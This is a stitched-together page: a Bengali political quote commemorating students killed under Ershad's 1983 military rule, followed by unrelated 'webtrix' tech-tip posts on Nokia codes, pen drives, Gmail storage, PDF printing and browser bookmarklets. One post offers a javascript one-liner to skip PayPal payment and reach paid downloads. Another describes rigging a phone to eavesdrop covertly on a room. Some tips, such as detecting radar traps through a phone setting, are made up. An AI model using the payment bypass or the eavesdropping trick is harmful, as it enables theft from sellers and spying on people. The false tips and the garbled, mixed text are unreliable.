"গত কয়েক বছরের মত আজও আমরা চিন্তার পক্ষ থকে এরশাদের সামরিকতন্ত্রের বিরুদ্ধে লড়তে গিয়ে যাঁরা শহিদ হয়েছেন তাঁদের স্মরণ করেছি। সকালে ‘শিক্ষা অধিকার চত্বর’ গিয়ে যখন পৌঁছলাম ততক্ষণে আরো অনেকেই এসে গিয়েছিলেন। গত বছরের চেয়ে এবার অনেক বেশী অংশগ্রহণ দেখলাম। ভাল লাগলো। এটা ভালো লক্ষণ। ফুল দেওয়া এই প্রকার স্মরণের বাহ্যিক দিক। কিন্তু তথাকথিত ‘ভালবাসা দিবস’ যখন তারুণ্যের বিপ্লবী গৌরব ও অর্জনকে খাবলে খেয়ে ফেলতে চায় তখন তিরাশির ১৪ ফেব্রুয়ারিতে ছাত্রদের সঙ্গে সেনাবাহিনীর যে রক্তক্ষয়ী সংঘর্ষ হয়েছিল সেই ইতিহাসকে আবার মনে করা ও অন্যদের মনে করিয়ে দেওয়া রাজনৈতিক কাজ। এই ‘তারুণ্য’চরিত্রের দিক থেকে একদমই ভিন্ন ছিল। কারণ তারা হাত বাড়িয়ে দিতে চেয়েছিল শ্রমিক ও কৃষক সংগঠনগুলোর আন্দোলন ও দাবিদাওয়ার দিকে। তখন ফেইসবুক বা টুইটার ছিল না, ফাল্গুণ এখনকার মতই হলুদ ছিল। সেই সময়েও হাত ধরাধরি করে ‘আহা আজি এ বসন্তে, এত ফুল ফোটে, এত বাঁশী বাজে, এতো পাখি গায়’ গান শোনা গিয়েছিল। ঢাকা শহর শহরের মতোই ছিল, যেখানে মফস্বলের আদল ফুটা থাকত এদিকে সেদিকে।। মধ্যবিত্ত তারুণ্যের মধ্যেমধ্যবিত্ত সুখদুঃখ ও চাওয়া পাওয়া মধ্যবিত্তের গণ্ডির মধ্যেই নিজেকে চরিতার্থ দেখতে চাইত। কিন্তু তারপরও বসন্তের মধ্যে এমন কিছু হাওয়া লেগেছিল যাকে শুধু তারুণ্য দিয়ে ব্যাখ্যা করা যায় না। রাজনৈতিকতার বিচার বাদ দিয়ে ‘মধ্যবিত্ত’ নামক ধারণা দিয়েও তাকে বোঝা যাবেনা। এই রাজনৈতিকতা এরশাদ শাহী ও তার হিংস্র সামরিকতন্ত্রকে শত্রু জ্ঞান করেছিল। যার সঙ্গে আপোষ চলে না। তখন ‘বসন্ত’ মিশর বা আরব দেশ থেকে আমদানি করে আনবার দরকার হয় নি। কারো হাতে সেলফোন ছিল না। চৌদ্দই ফেব্রুয়ারী বিশাল ছাত্র সমাবেশ অনুষ্ঠিত হয় ঢাকা বিশ্ববিদ্যালয়ের বটতলায়। বটতলা থেকে শিক্ষা ভবনের দিকে যেতে থাকে মিছিল। সেই সব ছবি মনের মধ্যে গেঁথে আছে। মিছিলে গুলি চালানো হয়। পুলিশের গুলি টিয়ার সেলের আঘাতে নিহত হয় জাফর, জয়নাল, দীপালী সাহা। বহু আহত হয়। আজ তাদের স্মরণ করবার দিন। স্মরণ করি সাংগঠনিকতা ও ঐক্যের সেই শক্তিকে যার ক্ষণিক বিস্ফার বাংলাদেশকেকাঁপিয়ে দিয়েছিল। রাজনৈতিকদলগুলো এখন কেউ হুসেইন এরশাদের মিত্র, কেউ মিত্র হবার কোশেশ করে যাচ্ছে। রাজনীতির এই বিকারের বিরুদ্ধে দাঁড়াবার জন্যও এই দিনটি স্মরণ না করে উপায়নাই। আজ স্মরণ করি শিবলি কাইয়ুমকে যিনি সামরিক শাসনের বিরুদ্ধে পোস্টার লাগাতে গিয়ে হাবিবুর রহমান ও আবদুল আলীসহ গ্রেফতার হন।সংক্ষিপ্ত সামরিক আদালতে তাদের সাত বছরের কারাদণ্ড হয়। সামরিক শাসনের বিরুদ্ধে এই লড়াইয়ের ইতিহাস মুছে ফেলবার বিরুদ্ধে আমাদের দাঁড়াতে হবে । " - ফারহাদ মাজহার

Tricks and secret tips for Nokia cellphone : Tricks and secret tips for Nokia cellphone Secret tricks for Nokia mobile orcell phone To check the phones Software revision for Nokia Mobile. On the main screen type*#92702689# [*#war0anty#] It will take you to a secret menuwhere you may find some of the information below: 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture 3. Displays (if there) the date where the phone was purchased(MMYY) 4. Displays the date of the last repair - if found (0000) 5. Shows life timer of phone (time passes since last start) To restore Factory Settings for Nokia mobile *#7780# reset to factory settings. Taking picture without getting noticed. Turn on/off the "click" sound made by the camera by selecting the 'Silent' profile or by turning warningtones on/off. Hiding your Mobile/ Cell phone Number Go to: Menu > Tools > Settings >Call > Send My Caller ID > 'Yes', 'No' or 'Set By Network' tofollow the defaultsettings of your home network. It works only with very fewnetwork who provide you facilityof “Private Number” Speed Dialing From Simcard contact (not stored in mobilephonebook) Type number followed by #then call. Example: 1# or 2# or 21# like u can do Change closed caller grou p (settings >security settings>user groups) to 00000 and your phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms atshop exits. Try this secret trick if you can handle the unexpected. Note: This secret trick wont workwith all phones Models. THE REBOOT TRICK This should work on all software versions of the 6110. 1. Go to the Calendar (Menu-8) 2. Make a note or reminder. 3. Enter some text into the edit box. 4. Hold "Clear" until the whole text is cleared, then press "Back". 5. Press "0". The main screen will now be showing but a space appears on the screen. (you can'tsee it) 6. Enter 4 digits (e.g. 1234). 7. Use the down arrow to move the cursor to the left side of the numbers and thespace (Down arrow twice). 8. Now enter 6 digits and press the call button. Wait for a few seconds, the screen should start to flash and reboots. It should also work on other menus like the "Profiles" menu. THE JAMES BOND TRICK If you short-circuit the left middleand right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile"Headset"will be activated. Before youdo this just activate the"Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out whatpeople are talking about in aroom. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying. NETWORK MONITOR There is a hidden menu inside your Nokia phone. If you want toactivate it, you'llhave to re-program some chips inside of your phone. 1. Check your software version.You can only continue if you havev4.33, v4.73 or v5.24. 2. Take apart the phone. 3. De-solder the EEPROM (ATMEL AT 24C64). 4. Read out the data with an EEPROM programmer and save it to a file (Backup). 5. If you have v.33 or v4.73, change the address"03B8" from"00" to "FF". 6. If you have v5.24 thenchanges the address "0378"from "00" to "FF". 7. Write the new data to the EEPROM and solder it back to the phone, 8. Power on your phone and you should have "Net monitor" enabled. - webtrix, a BVM product. Ad: get 80% discount on web hosting and other at www.godaddy.com

FORMAT VIRUS INFECTED PEN DRIVE/MEMORY CARD EFFECTIVELY: HELLO FRIENDS TODAY i AM GOING TO SHARE THREE WAYS OF FORMATTING AN INFECTED PENDRIVE/VIRUS WHICH WE ARE UNABLE TO FORMAT DIRECTLY....MAYBE THE FIRST ONE MAY NOT WORK BUT THE SECOND WAY WILL WORK 100%....SO CHECK THEM OUT... 1. PRESS WINDOWS KEY ANDGO TO RUN TYPE cmd AND PRESS ENTER NOW IN THE DOS WINDOW(BLACK SCREEN) TYPE THE FOLLOWING "FORMAT F "(here F is the drive letter of my pen drive/memory card and write without quotes) 2. IF THE ABOVE METHOD DOES NOT WORK TRY THIS OUT .. THIS WILL OBVIOUSLY WORK.. PRESS WINDOWS KEY AND GO TO RUN TYPE cmd AND PRESS ENTER NOW IN THE DOS WINDOW(BLACK SCREEN) TYPE THE FOLLOWING "FORMAT X: /FS:FAT32 /Q /V: PenDrive" (here x is thedrive letter of my pen drive/memory card..and write without quotes AND DONOT GIVE SPACE BETWEEN"V: AND PENDRIVE" HERE I GIVED SPACE BECAUSE IT WAS TURNING INTO A SMILEY) 3. Use a Linux Box Other solution to the infected pen drive is view the contents of pen drive using a Linux System. As most of the viruses affect Windows PC’s, it is very unlikely that pen drive virusmay be effective on any Linux system. When you’ll view the contents of infected pen drive from Linux Box, you’ll be able to spot the virus and delete it permanently i.e you can format it in a computer having ubuntu or some other linux based operating system.. HOPE THIS HELPS ALL OF YOU.... -webtrix. Ad: get 80% discount at www.godaddy.com

Gmail Drive guide to use Gmail space as online storage drive : Gmail is really famous among users of all the email clients available on the web and that is not because it has a cool interface rather it is famous for its reliability and huge space which includes storage space of 6000 megabytes and increasing. Google doesn’t stop here and recently Google announced that users can now buy more online storage for Google services just by paying a little amount. So why not use this online storage space and use it externally probably as a network drive or one of your own computer hard drives. Use Google Storage Space as Google Drive I am going to show different methods by which your can use your Gmail account space as your external hard drive that too free. You will be able todownload (or should I say copy) attachments from your Gmail account to your computer just as you would do from a drive on your computer. You can also use this space to upload content directfrom your computer and save it online in your Gmail account. 1. GMAIL DRIVE GMail Drive is a Shell Namespace Extension that creates a virtual filesystem around your Google Mail account, allowing you to use Gmail as a storage medium. GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer. GMail Drive literally adds a new drive to your computer under the My Computerfolder, where you can create new folders, copy and drag’n'drop files to. With GMail Drive you can easily copy files to your Google Mail Account and retrieve them again. When you create a new file using GMail Drive, itgenerates an e-mail and posts it to your account. The e-mail appears in your normalInbox folder, and the file is attached as an e-mail attachment. GMail Drive periodicallychecks your mail account (using the Gmail search function) to see if new files have arrived and to rebuild the directory structures. But basically GMail Drive acts as any other hard-drive installed on your computer. You can copy files to and from the GMail Drive folder simply by using drag’n'drop like you’re used to with the normal Explorer folders. Because the Gmail files will clutter up your Inbox folder, you may wish to create a filter in Gmail to automatically move thefiles (prefixed with the GMAILFS letters in the subject) to your archived mail folder. Please note that GMail Drive is still an experimental tool. There’s still a number of limitations of the file-system (such as total filename size must be less than 65 characters). Since the tool hooks up with the free Gmail Service provided by Google, changes in the Gmail system may break the tool’s ability to function. I cannot guarantee that files stored in this manner will be accessible in thefuture. new type of file sharingutility. Unlike typical file servers (say xDrive) it uses Gmail asbackend file server. You can enjoy it simply by hosting a small PHP script in your web site without any database. Gmail file space is morethan 2GB, so you can imagine you already have such a big space on internet. However, you will require a Gmailaccount (If you don’t have any Gmail address, go GmailSwap or ask your friends.). PGD automatically connects Gmail server and fetches list of all attached files and generate downloadablelinks in a tree like view. * Successfully connectsto Gmail and only grabslist of Attachments in Gmail messages. * List of attachments are displayed with inbuilt Javascript engine. You can customize output to any other formats. * 100% compliant to GMAILFS. So you can upload with Windows Gmail Shell extension or Linux GmailFS utilities.. * Supports Multiple Gmail accounts in the same script . * Supports all browsers. * Total size is less than100 KB. -webtrix. Ad: 80% discount @ www.godaddy.com

Webtrix: Hi everybody here the discount offer. Host your own domain at USD 9.95/yr. Goto www.Godaddy.com ! ! - webtrix, a BVM product.

The Samsung ML-2955DW monochrome laser printer is notable for its very low streetprice ($150 as of February 8, 2012) and its full network connectivity, namely USB, ethernet, and Wi-Fi. Unfortunately, the expensive toner restricts it to low-volume use. -webtrix, a BVM product

Beta version of google chrome for android and other are available here!! Just check it> 1. http://www.cbku.info/android-apps/download-google-chrome-for-android-is-available-in-beta-version.htm 2. http://www.google.com/landing/chrome/beta/

Convert Any Document or Web Page to PDF Convert Any Document or Web Page to PDF Somebody just told youthat you need to have Adobe Acrobat (Writer)to create a PDF file? Guess what, you can get away from that pricey piece of software if you just need to convert some documents to pdf, without a need of fancyediting the pdf document. Here's how. Thanks to the BullZip, who provides a Free Pdf printer. With this free tool, you can simply"print out" your document or webpage to a pdf file, just about the same way as you print it out to a printer. You can visit www.bullzip.com for more information about the software. To get started, first follow the link above and download Free Pdf Printer from BullZip , then install it to your computer. Once you're done, you might need to close the program (or the web browser) which you're currently viewing the document. This helps refreshing the list of available printers on your computer. Once you get back to the document you want to convert, perform thesame steps are you print out the document,i.e. File > Print ... When you see the Print window pop-up, select"Bullzip PDF Printer" under "Printers", then click "OK". BullZip PDF Printer willthen start to analyze your document and display a new pop-up window, where you can direct it to the location you want to save the pdf file. Follow the pop-up windows ! ThePDF document is created! -webtrixt

LOOKING FOR PC TRICK? Here are a few.Try them: For Windows PC user 1. What’s with the word “CON”? *. Try to create a folder anywhere you like (i.e. desktop, my documents). *. Rename the folder with CON andsee what will happen. *. Try to rename other files (i.e. images, documents) withCON. Still, it doesn’t change right? 2. What’s up with “BUSH”? *. Open your notepad. *. Type “ Bush hid the facts” without the “ “. *. Save it and open it again. 3. Test the strength of youranti-virus *. Do you want to know if your anti-virus is really protecting your PC? Open your notepad and copy-paste the code below. X50!P%@AP[4\PZX54(P^)7CC)7}EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H H* *. Save the file as eicar.com. If your anti-virusis really protecting your PC, it will warn you about this “virus tester”. NOTE: This isn’t harmful to your PC. This is just a simple test to check if your anti-virus can detect virus. For more info, click here . Internet / Browser tricks 1. Flying Images *. Go to Google Images . *. Search for anything you want (i.e. dog, baby). *. Now, copy and paste the code below in your address bar and hit Enter . javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length;function A(){for(i=0; i-DIL; i ){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1 i*x2 x3)*x4 x5) "px"; DIS.top=(Math.cos(R*y1 i*y2 y3)*y4 y5) "px"}R }setInterval('A()',5); void(0); 2. Your web browser is shaking! This is a simple trick. Just copy and paste the code below in your address bar and see what will happen. javascript:function Shw(n) {if(self.moveBy) {for (i = 35; i> 0; i--){for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6) 3. Hack any website and editthem *. Actually, with this trick, you won’t really be able to hack any website (I just named it that way) but you can edit them. *. Visit any website and copy-paste the code below in your address bar. javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 *. Edit the website accordingto your preferences; you can add texts, remove paragraphs and more! - webtrix, a BVM product

Crack(Bypass) PayPal Payment Step and download widout paying nthng : With the help of this web trick you are able to bypassor crack paypal payment step. For this web trick you have to use a small piece ofJava Script to crack paypal .When you just insert this Java script in the address bar when you reach to the payment step,it directly takeyou to the download link. So this web trick is only apply on the web site which provide paid download. So hurry use this java script and get free download online by cracking paypal payment step. Before doing this web trick,lets understand how the paypal money transfer process takes palce: PayPal is a service that allows you to pay your payments through internet as well as money transfers facility through the Internet. When we pay a web site through paypal by clicking on "PAY NOW" button, as the payment get transfer to the account of the Owner they will redirect you to the secrete download page. Remember this download page is secret, but anyone who knows the URL of this page can access it. By usingthis javascript we canescape the payment stepand get the secret page of download . Now this pc trick works onlyfor the of download pages, i.e. for websites using Paypal’s “Pay Now” button for downloadonly.below is the piece of code: javascript:top.location=document.getElementsByName('return')[0].value; Use this Above Java script to perform this pc trick and enjoy paid stuff absolutely free without paying zero money.Please place your comment about this pc trick .You have to place this JavaScript in the Address bar when you reach to the Pay NOW step and just to click Enter to crack payapal. - Webtrix, a BVM product

Read PDF files in your Mobile without any software: Hi friends, today when i wassurfing th internet i found an awesome trick by which we can read any pdf file in our mobile or pc without anysoftware. We haveto do justone thing for this that just go to this link... view(dot)samurajdata(dot)seand upload your pdf file or you can add any link of pdf file and you will able to viewany large pdf file..That's it. I don't know it previously posted or not by someone but i think it's so useful. -webtrix corp. , a BVM product

Know about virus: One of the biggest fears among new computer users is being infected by a computer virus or programsdesigned to destroy their personal data. Viruses are malicious software programsthat have been designed byother computer users to cause destruction and havoc on a computer and spread themselves to other computers where they can repeat the process. Once the virus is made, it isoften distributed through shareware, pirated software, e-mail, P2P programs, or other programs where users share data.A computer virusis a software program that was first written Rich Skrenta in 1982 who was a 15-year oldhigh school student. Known as The ElkCloner this virus spread to other computers by monitoring the floppy drive and copying itself to any floppy diskette that was inserted into the computer. Once a floppy diskette became infected it would infect all other computers that disk was inserted into, each computer thatwas infected would then infect everyfloppy diskettes inserted into it. A computer that was infected would alsodisplay a short poem on every 50th boot. Computer users can help protect themselves against computer viruses, malware, and other computer securitythreats by installing an antivirus protection program. -webtrix corp. , a BVM product.

Webtrix: Nominate yor android browser. Hello evrybdy, webtrix, a BVM product brings here the platform to nominate your android browser! ! Check the link below. http://browsers.about.com/u/ntn/allaboutwebbrowsers/2012-Best-Android-Browser-Nomination/form.htm

How to acess gmail offline : Gmail, the most popularemail service in the world is in the path of making their service better. Google has launched an extension for Google chrome browser that allows you to read, reply to and compose emails even when there is no Internet connection. More than just an offline app, the streamlined user interface, based off Gmail’s popular tablet interface, provides extremely fast response time with a pure, email focused experience. Once you install the Gmail offline application you will be able to access the mailsin your inbox, can send replies to your mails, search and archive your mails and when you are connected to internet all the changesyou made will be synchronized. How to Access Gmail Offline Go to the Chrome Web Store and install the new Offline Gmail app. Once installed, open a new tab and launch the app. You’ll be asked to allowoffline mail storage. When you give approve, your inbox data will be stored on the computer you’re using. So take extreme care not to install this app on a public computer. If you want to delete your offline inbox from the computer you installed, then type in the address bar,chrome://settings/cookies and press Enter. Then, search for “mail.google.com.” Hover over all the search results and clickthe “X” to delete them. Remember that uninstalling the Chromeapp alone will not remove offline data. This extension works extremely fast without letting you know about the synchronization process. Unfortunately this feature works only for Chrome. We can hope that Google will roll out the offline feature for Firefox and other major browsers soon. - webtrix corp. , a BVM product